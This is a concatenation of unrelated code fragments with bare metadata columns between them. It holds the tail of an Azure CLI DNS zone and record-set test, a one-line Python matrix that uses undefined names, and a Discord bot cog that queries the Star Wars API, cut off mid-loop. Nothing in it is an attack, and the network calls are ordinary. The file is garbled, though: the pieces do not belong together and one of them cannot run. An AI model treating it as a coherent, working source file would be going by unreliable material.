self.cmd('network dns record-set {0} create -n myrs{0} -g {{rg}} --zone-name {{zone}}'.format(t))
add_command = 'set-record' if t == 'cname' else 'add-record'
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t], add_command))
# test creating the record set at the same time you add records
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0}alt {1}'.format(t, args[t], add_command))
self.cmd('network dns record-set a add-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set soa update -g {{rg}} --zone-name {{zone}} {0}'.format(args['soa']))
long_value = '0123456789' * 50
self.cmd('network dns record-set txt add-record -g {{rg}} -z {{zone}} -n longtxt -v {0}'.format(long_value))
typed_record_sets = 2 * len(record_types) + 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets + typed_record_sets))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 2))
# test list vs. list type
self.cmd('network dns record-set list -g {rg} -z {zone}',
checks=self.check('length(@)', base_record_sets + typed_record_sets))
self.cmd('network dns record-set txt list -g {rg} -z {zone}',
checks=self.check('length(@)', 3))
for t in record_types:
self.cmd('network dns record-set {0} remove-record -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t]))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 1))
self.cmd('network dns record-set a remove-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.is_empty())
self.cmd('network dns record-set a delete -n myrsa -g {rg} --zone-name {zone} -y')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}')
self.cmd('network dns zone delete -g {rg} -n {zone} -y',
checks=self.is_empty())
@ResourceGroupPreparer(name_prefix='cli_test_dns')
def test_private_dns(self, resource_group): # pylint: disable=unused-argument
self.kwargs['zone'] = 'myprivatezone.com'
self.kwargs['regvnet'] = 'regvnet'
self.kwargs['resvnet'] = 'resvnet'
self.cmd('network vnet create -n {regvnet} -g {rg}')
self.cmd('network vnet create -n {resvnet} -g {rg}')
self.cmd('network dns zone list') # just verify it works (no exception raised)
self.cmd('network dns zone create -n {zone} -g {rg} --zone-type Private --registration-vnets {regvnet} --resolution-vnets {resvnet}')
self.cmd('network dns zone list -g {rg}',
checks=self.check('length(@)', 1))
self.cmd('network dns zone update -n {zone} -g {rg} --zone-type Private --registration-vnets "" --resolution-vnets ""')
self.cmd('network dns zone update -n {zone} -g {rg} --zone-type Private --registration-vnets {regvnet} --resolution-vnets {resvnet}')
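# a private zone starts with only its SOA record set; no NS set is created because delegation is unsupported (see note below)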
base_record_sets = 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets))
args = {
'a': '--ipv4-address 10.0.0.10',
'aaaa': '--ipv6-address 2001:db8:0:1:1:1:1:1',
'caa': '--flags 0 --tag foo --value "my value"',
'cname': '--cname mycname',
'mx': '--exchange 12 --preference 13',
'ptr': '--ptrdname foobar.com',
'soa': '--email foo.com --expire-time 30 --minimum-ttl 20 --refresh-time 60 --retry-time 90 --serial-number 123',
'srv': '--port 1234 --priority 1 --target target.com --weight 50',
'txt': '--value some_text'
}
# Private Zones do NOT support delegation through NS records
record_types = ['a', 'aaaa', 'caa', 'cname', 'mx', 'ptr', 'srv', 'txt']
for t in record_types:
# test creating the record set and then adding records
self.cmd('network dns record-set {0} create -n myrs{0} -g {{rg}} --zone-name {{zone}}'.format(t))
add_command = 'set-record' if t == 'cname' else 'add-record'
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t], add_command))
# test creating the record set at the same time you add records
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0}alt {1}'.format(t, args[t], add_command))
self.cmd('network dns record-set a add-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set soa update -g {{rg}} --zone-name {{zone}} {0}'.format(args['soa']))
long_value = '0123456789' * 50
self.cmd('network dns record-set txt add-record -g {{rg}} -z {{zone}} -n longtxt -v {0}'.format(long_value))
typed_record_sets = 2 * len(record_types) + 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets + typed_record_sets))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 2))
# test list vs. list type
self.cmd('network dns record-set list -g {rg} -z {zone}',
checks=self.check('length(@)', base_record_sets + typed_record_sets))
self.cmd('network dns record-set txt list -g {rg} -z {zone}',
checks=self.check('length(@)', 3))
for t in record_types:
self.cmd('network dns record-set {0} remove-record -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t]))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 1))
self.cmd('network dns record-set a remove-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.is_empty())
self.cmd('network dns record-set a delete -n myrsa -g {rg} --zone-name {zone} -y')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}', expect_failure=True)
self.cmd('network dns zone delete -g {rg} -n {zone} -y',
checks=self.is_empty())
if __name__ == '__main__':
unittest.main()
| 51.781609
| 150
| 0.575472
| 1,266
| 9,010
| 4.035545
| 0.14218
| 0.063026
| 0.126052
| 0.146408
| 0.895087
| 0.8945
| 0.884713
| 0.874535
| 0.855158
| 0.855158
| 0
| 0.026189
| 0.237181
| 9,010
| 173
| 151
| 52.080925
| 0.717154
| 0.094673
| 0
| 0.775862
| 0
| 0.267241
| 0.526904
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.025862
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97db50d2849762e9e8fce2dd03942342c5cab4e4
| 272
|
py
|
Python
|
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | 2
|
2021-03-12T17:08:21.000Z
|
2022-03-21T09:09:22.000Z
|
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | null | null | null |
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | null | null | null |
E = [[ 0, 1, 0, 0, 0, 0],
[E21, 0, 0, E24, E25, 0],
[ 0, 0, 0, 1, 0, 0],
[ 0, 0, E43, 0, 0, -1],
[ 0, 0, 0, 0, 0, 1],
[E61, 0, 0, E64, E65, 0]]
| 38.857143
| 45
| 0.1875
| 37
| 272
| 1.378378
| 0.27027
| 0.627451
| 0.529412
| 0.392157
| 0.470588
| 0.392157
| 0.27451
| 0
| 0
| 0
| 0
| 0.421569
| 0.625
| 272
| 6
| 46
| 45.333333
| 0.078431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97e9b2e553509f65526061b8c93b1c492238621a
| 46,884
|
py
|
Python
|
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2018-Present NeuroAssassin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
from typing import Union
import aiohttp
import discord
from redbot.core import checks, commands
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from .image import (
HUMANDESCRIPTION,
IMAGES,
PLANETDESCRIPTION,
PLANETS,
PLANETTHUMBNAIL,
SPECIESDESCRIPTION,
SPECIESTHUMBNAIL,
STARSHIPDESCRIPTIONS,
STARSHIPSIMAGES,
VEHICLEDESCRIPTION,
VEHICLEIMAGE,
)
class SW(commands.Cog):
"""Interact with the Star Wars API"""
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
def cog_unload(self):
self.__unload()
def __unload(self):
self.session.detach()
async def red_delete_data_for_user(self, **kwargs):
"""This cog does not store user data"""
return
@checks.bot_has_permissions(embed_links=True)
@commands.group(name="swapi", aliases=["starwars"])
async def starwars(self, ctx):
"""Group command for interacting with the Star Wars API"""
pass
@starwars.command()
async def person(self, ctx, person_id: Union[int, str]):
"""Gets the profile of a person by their ID"""
if isinstance(person_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/people/" + str(person_id)
)
if response.status == 404:
return await ctx.send("Invalid Person ID.")
person = json.loads(await response.text())
embed = discord.Embed(
title=f"Person: {person['name']}",
description=HUMANDESCRIPTION[person["name"]],
color=0x32CD32,
)
embed.add_field(name="ID:", value=str(person_id))
for key, value in person.items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=IMAGES[person["name"]])
homeworld_num = int(person["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(person["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
films = []
for film in person["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
if person["species"]:
species_num = int(person["species"][0].split(r"/")[-2])
species = await self.session.get(person["species"][0])
species = json.loads(await species.text())
embed.add_field(
name="Species", value=f"Name: {species['name']}; ID: {str(species_num)}",
)
else:
embed.add_field(name="Species", value="Name: Unknown")
vehicles = []
for vehicle in person["vehicles"]:
vehicle_num = int(vehicle.split(r"/")[-2])
response = await self.session.get(vehicle)
vehicle = json.loads(await response.text())
vehicles.append(f"Name: {vehicle['name']}; ID: {str(vehicle_num)}")
if len(vehicles) != 0:
embed.add_field(name="Vehicles:", value="\n".join(vehicles))
starships = []
for starship in person["starships"]:
starship_num = int(starship.split(r"/")[-2])
response = await self.session.get(starship)
starship = json.loads(await response.text())
starships.append(f"Name: {starship['name']}; ID: {str(starship_num)}")
if len(starships) != 0:
embed.add_field(name="Starships:", value="\n".join(starships))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/people/?search=" + str(person_id)
)
if response.status == 404:
return await ctx.send("Invalid Person ID.")
person = json.loads(await response.text())
name = person["results"][0]["name"]
embed = discord.Embed(
title=f"Person: {name}", description=HUMANDESCRIPTION[name], color=0x32CD32,
)
for key, value in person["results"][0].items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=IMAGES[name])
homeworld_num = int(person["results"][0]["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(person["results"][0]["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
films = []
for film in person["results"][0]["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
if person["results"][0]["species"]:
species_num = int(person["results"][0]["species"][0].split(r"/")[-2])
species = await self.session.get(person["results"][0]["species"][0])
species = json.loads(await species.text())
embed.add_field(
name="Species", value=f"Name: {species['name']}; ID: {str(species_num)}",
)
else:
embed.add_field(name="Species", value="Name: Unknown")
vehicles = []
for vehicle in person["results"][0]["vehicles"]:
vehicle_num = int(vehicle.split(r"/")[-2])
response = await self.session.get(vehicle)
vehicle = json.loads(await response.text())
vehicles.append(f"Name: {vehicle['name']}; ID: {str(vehicle_num)}")
if len(vehicles) != 0:
embed.add_field(name="Vehicles:", value="\n".join(vehicles))
starships = []
for starship in person["results"][0]["starships"]:
starship_num = int(starship.split(r"/")[-2])
response = await self.session.get(starship)
starship = json.loads(await response.text())
starships.append(f"Name: {starship['name']}; ID: {str(starship_num)}")
if len(starships) != 0:
embed.add_field(name="Starships:", value="\n".join(starships))
await ctx.send(embed=embed)
@starwars.command()
async def planet(self, ctx, planet_id: Union[int, str]):
"""Gets the profile of a planet by their ID"""
if isinstance(planet_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/planets/" + str(planet_id)
)
if response.status == 404:
return await ctx.send("Invalid Planet ID.")
planet = json.loads(await response.text())
embed = discord.Embed(
title=f"Planet: {planet['name']}",
description=PLANETDESCRIPTION[planet["name"]],
color=0x800080,
)
embed.add_field(name="ID:", value=str(planet_id))
for key, value in planet.items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=PLANETTHUMBNAIL[planet["name"]])
embed.set_image(url=PLANETS[planet["name"]])
films = []
for film in planet["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
residents = []
for resident in planet["residents"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed.add_field(name="Residents:", value="\n".join(residents))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/planets/?search=" + str(planet_id)
)
if response.status == 404:
return await ctx.send("Invalid Planet ID.")
planet = json.loads(await response.text())
name = planet["results"][0]["name"]
embed = discord.Embed(
title=f"Planet: {name}", description=PLANETDESCRIPTION[name], color=0x800080,
)
for key, value in planet["results"][0].items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=PLANETTHUMBNAIL[name])
embed.set_image(url=PLANETS[name])
films = []
for film in planet["results"][0]["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
residents = []
for resident in planet["results"][0]["residents"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed.add_field(name="Residents:", value="\n".join(residents))
await ctx.send(embed=embed)
@starwars.command()
async def film(self, ctx, film_id: Union[int, str]):
"""Gets the info about a film by their ID"""
if isinstance(film_id, int):
async with ctx.typing():
response = await self.session.get(r"https://swapi.dev/api/films/" + str(film_id))
if response.status == 404:
return await ctx.send("Invalid Film ID.")
film = json.loads(await response.text())
embed = discord.Embed(title=f"Film: {film['title']}; Page 1/4", color=0x0000FF)
embed.add_field(name="ID:", value=str(film_id))
for key, value in film.items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
embed2 = discord.Embed(title=f"Film: {film['title']}; Page 2/4", color=0x0000FF)
embed2.add_field(name="Opening Crawl", value=film["opening_crawl"])
embed3 = discord.Embed(title=f"Film: {film['title']}; Page 3/4", color=0x0000FF)
residents = []
for resident in film["characters"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed3.add_field(name="Characters:", value="\n".join(residents))
planets = []
for planet in film["planets"]:
planet_num = int(planet.split(r"/")[-2])
response = await self.session.get(planet)
planet = json.loads(await response.text())
planets.append(f"Name: {planet['name']}; ID: {str(planet_num)}")
if len(planets) != 0:
embed3.add_field(name="Planets:", value="\n".join(planets))
embed4 = discord.Embed(title=f"Film: {film['title']}; Page 4/4", color=0x0000FF)
objects = []
for entry in film["starships"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Starships:", value="\n".join(objects))
objects = []
for entry in film["vehicles"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Vehicles:", value="\n".join(objects))
objects = []
for entry in film["species"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Species:", value="\n".join(objects))
embeds = [embed, embed2, embed3, embed4]
await menu(ctx, embeds, DEFAULT_CONTROLS)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/films/?search=" + str(film_id)
)
if response.status == 404:
return await ctx.send("Invalid Film ID.")
film = json.loads(await response.text())
name = film["results"][0]["title"]
embed = discord.Embed(title=f"Film: {name}; Page 1/4", color=0x0000FF)
for key, value in film["results"][0].items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
embed2 = discord.Embed(title=f"Film: {name}; Page 2/4", color=0x0000FF)
embed2.add_field(name="Opening Crawl", value=film["results"][0]["opening_crawl"])
embed3 = discord.Embed(title=f"Film: {name}; Page 3/4", color=0x0000FF)
residents = []
for resident in film["results"][0]["characters"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed3.add_field(name="Characters:", value="\n".join(residents))
planets = []
for planet in film["results"][0]["planets"]:
planet_num = int(planet.split(r"/")[-2])
response = await self.session.get(planet)
planet = json.loads(await response.text())
planets.append(f"Name: {planet['name']}; ID: {str(planet_num)}")
if len(planets) != 0:
embed3.add_field(name="Planets:", value="\n".join(planets))
embed4 = discord.Embed(title=f"Film: {name}; Page 4/4", color=0x0000FF)
objects = []
for entry in film["results"][0]["starships"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Starships:", value="\n".join(objects))
objects = []
for entry in film["results"][0]["vehicles"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Vehicles:", value="\n".join(objects))
objects = []
for entry in film["results"][0]["species"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Species:", value="\n".join(objects))
embeds = [embed, embed2, embed3, embed4]
await menu(ctx, embeds, DEFAULT_CONTROLS)
@starwars.command()
async def starship(self, ctx, starship_id: Union[int, str]):
"""Gets the profile of a starship by its ID"""
if isinstance(starship_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/starships/" + str(starship_id)
)
if response.status == 404:
return await ctx.send("Invalid Starship ID.")
starship = json.loads(await response.text())
embed = discord.Embed(
title=f"Starship: {starship['name']}",
description=STARSHIPDESCRIPTIONS[starship["name"]],
color=0x000000,
)
embed.add_field(name="ID:", value=str(starship_id))
for key, value in starship.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_image(url=STARSHIPSIMAGES[starship["name"]])
objects = []
for entry in starship["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in starship["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/starships/?search=" + str(starship_id)
)
if response.status == 404:
return await ctx.send("Invalid Starship ID.")
starship = json.loads(await response.text())
name = starship["results"][0]["name"]
embed = discord.Embed(
title=f"Starship: {name}",
description=STARSHIPDESCRIPTIONS[name],
color=0x000000,
)
for key, value in starship["results"][0].items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=STARSHIPSIMAGES[name])
for entry in starship["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in starship["results"][0]["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.command()
async def vehicle(self, ctx, vehicle_id: Union[int, str]):
"""Gets the profile of a vehicle by its ID"""
if isinstance(vehicle_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/vehicles/" + str(vehicle_id)
)
if response.status == 404:
return await ctx.send("Invalid Vehicle ID.")
vehicle = json.loads(await response.text())
embed = discord.Embed(
title=f"Vehicle: {vehicle['name']}",
description=VEHICLEDESCRIPTION[vehicle["name"]],
color=0x228B22,
)
embed.add_field(name="ID:", value=str(vehicle_id))
for key, value in vehicle.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=VEHICLEIMAGE[vehicle["name"]])
for entry in vehicle["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in vehicle["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/vehicles/?search=" + str(vehicle_id)
)
if response.status == 404:
return await ctx.send("Invalid Vehicle ID.")
vehicle = json.loads(await response.text())
name = vehicle["results"][0]["name"]
embed = discord.Embed(
title=f"Vehicle: {name}", description=VEHICLEDESCRIPTION[name], color=0x228B22,
)
for key, value in vehicle["results"][0].items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=VEHICLEIMAGE[name])
for entry in vehicle["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in vehicle["results"][0]["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.command()
async def species(self, ctx, species_id: Union[int, str]):
"""Gets the profile of a species by its ID"""
if isinstance(species_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/species/" + str(species_id)
)
if response.status == 404:
return await ctx.send("Invalid Species ID.")
species = json.loads(await response.text())
embed = discord.Embed(
title=f"Species: {species['name']}",
description=SPECIESDESCRIPTION[species["name"]],
color=0xD2B48C,
)
embed.add_field(name="ID:", value=str(species_id))
for key, value in species.items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=SPECIESTHUMBNAIL[species["name"]])
homeworld_num = int(species["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(species["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
objects = []
for entry in species["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in species["people"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="People:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/species/?search=" + str(species_id)
)
if response.status == 404:
return await ctx.send("Invalid Species ID.")
species = json.loads(await response.text())
name = species["results"][0]["name"]
embed = discord.Embed(
title=f"Species: {name}", description=SPECIESDESCRIPTION[name], color=0xD2B48C,
)
embed.add_field(name="ID:", value=str(species_id))
for key, value in species["results"][0].items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=SPECIESTHUMBNAIL[name])
homeworld_num = int(species["results"][0]["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(species["results"][0]["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
objects = []
for entry in species["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in species["results"][0]["people"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="People:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.group(name="all")
async def _all_group(self, ctx):
"""Get all people, planets, starships, vehicles, species or films of star wars"""
pass
@_all_group.command()
async def people(self, ctx):
"""Grabs all people in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/people"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
